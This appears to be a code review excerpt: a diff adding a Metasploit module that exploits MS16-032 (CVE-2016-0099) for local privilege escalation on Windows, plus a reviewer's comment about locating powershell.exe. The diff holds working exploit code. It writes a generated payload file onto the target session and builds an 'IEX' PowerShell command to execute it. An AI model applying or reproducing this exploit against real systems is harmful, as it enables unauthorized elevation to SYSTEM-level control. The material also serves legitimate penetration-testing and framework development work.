modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb

```diff
@@ -0,0 +1,519 @@
+
+ For further information, please visit: https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
+
+Copyright 2016, Ruben Boonen (@FuzzySec)
+License BSD 3-Clause
+          },
+       'License'       => "BSD 3-Clause",
+       'Author'        =>
+         [
+           'James Forshaw', #twitter.com/tiraniddo
+           'b33f',#@FuzzySec, http://www.fuzzysecurity.com'
+           'khr0x40sh'
+         ],
+       'References'    =>
+         [
+           [ 'MS', 'MS16-032'],
+           [ 'CVE', '2016-0099'],
+           [ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
+           [ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
+         ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread'
+          },
+        'DisclosureDate' => 'Mar 21, 2016',
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ],
+        'Targets'        =>
+          [
+            # Tested on (32 bits):
+            # * Windows 7 SP1
+            [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+            # Tested on (64 bits):
+            # * Windows 7 SP1
+            # * Windows 8
+            # * Windows 2012
+            [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+          ],
+        'DefaultTarget' => 0
+      ))
+
+    register_options([
+      ])
+    register_advanced_options(
+      [
+        OptString.new('W_PATH', [false, 'Where to write temporary powershell file', ""]),
+        OptBool.new(  'DELETE',  [false, 'Delete temporary powershell file', true]),
+        OptBool.new(  'DRY_RUN',  [false, 'Only show what would be done', false ]),
+        OptInt.new('TIMEOUT',   [false, 'Execution timeout', 60]) #How long until we DELETE file, we have a race condition here, so anything less than 60 seconds might break
+      ], self.class)
+  end
+
+
+  def check
+    os = sysinfo["OS"]
+
+    if os !~ /windows/i
+      # Non-Windows systems are definitely not affected.
+      return Exploit::CheckCode::Safe
+    end
+
+    if sysinfo["Architecture"] =~ /(wow|x)64/i
+      arch = ARCH_X86_64
+    elsif sysinfo["Architecture"] =~ /x86/i
+      arch = ARCH_X86
+    end
+      return arch
+  end
+
+  def exploit
+
+  arch1 = check
+
+  # Exploit PoC from 'b33f'
+  ms16_032 = ms16_032ps
+
+  # Using venom_generator to produce compressed powershell script.  See class at bottom of module.
+  payl = setup_pay
+
+  upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
+  path = pwd || datastore['W_PATH']
+  upfile = "#{path}\\#{upfile}"
+  fd =session.fs.file.new(upfile,"wb")
+  print_status("Writing payload file, #{upfile}...")
+  fd.write(payl)
+  fd.close
+  psh_cmd="IEX `$(gc #{upfile})"
+
+  cmdstr="C:\\Windows\\System32\\windowspowershell\\v1.0\\powershell.exe"
```

Comment:
I assume that arch of powershell doesn't matter? If not, then:
``` ruby
cmdstr = expand_path('%WINDIR%\System32\windowspowershell\v1.0\powershell.exe)
```
If arch does matter, you'll have to do more dancing.